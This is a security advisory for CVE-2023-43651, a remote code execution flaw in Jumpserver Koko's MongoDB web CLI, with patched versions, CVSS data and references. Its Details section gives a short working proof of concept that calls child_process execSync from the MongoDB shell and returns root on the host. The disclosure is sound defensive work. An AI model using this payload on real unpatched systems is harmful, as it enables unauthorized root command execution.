CVE-2023-43651
MEDIUM6.4EPSS 5.9%Jumpserver Koko vulnerable to remote code execution on the host system via MongoDB shell
Description
### Impact An authenticated user can exploit a vulnerability in MongoDB sessions to execute arbitrary commands, leading to remote code execution. This vulnerability may further be leveraged to gain root privileges on the host system. ### Details Through the WEB CLI interface provided by koko, a user logs into the authorized mongoDB database and exploits the MongoDB session to execute arbitrary commands. ``` admin> const { execSync } = require("child_process") admin> console.log(execSync("id; hostname;").toString()) uid=0(root) gid=0(root) groups=0(root) jms_koko admin> ``` ### Patches Safe versions: - v2.28.20 - v3.7.1 ### Workarounds It is recommended to upgrade the safe versions. After upgrade, you can use the same method to check whether the vulnerability is fixed. ``` admin> console.log(execSync("id; hostname;").toString()) /bin/sh: line 1: /bin/hostname: Permission denied ``` ### References Thanks for **Oskar Zeino-Mahmalat** of [Sonar](https://sonarsource.com/) found and report this vulnerability
Affected packages (1)
- Go/github.com/jumpserver/koko>= 2.0.0, < 2.28.20
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM6.4 | CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H |
References (5)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2023-43651
- PATCHhttps://github.com/jumpserver/koko
- WEBhttps://github.com/jumpserver/jumpserver/security/advisories/GHSA-4r5x-x283-wm96
- WEBhttps://github.com/jumpserver/koko/commit/7d80db95d17c8f42bdf50260dfc21dc2bd0452c2
- WEBhttps://github.com/jumpserver/koko/commit/857f8b9e41f0930dc6190a35d8601fffa5e884e7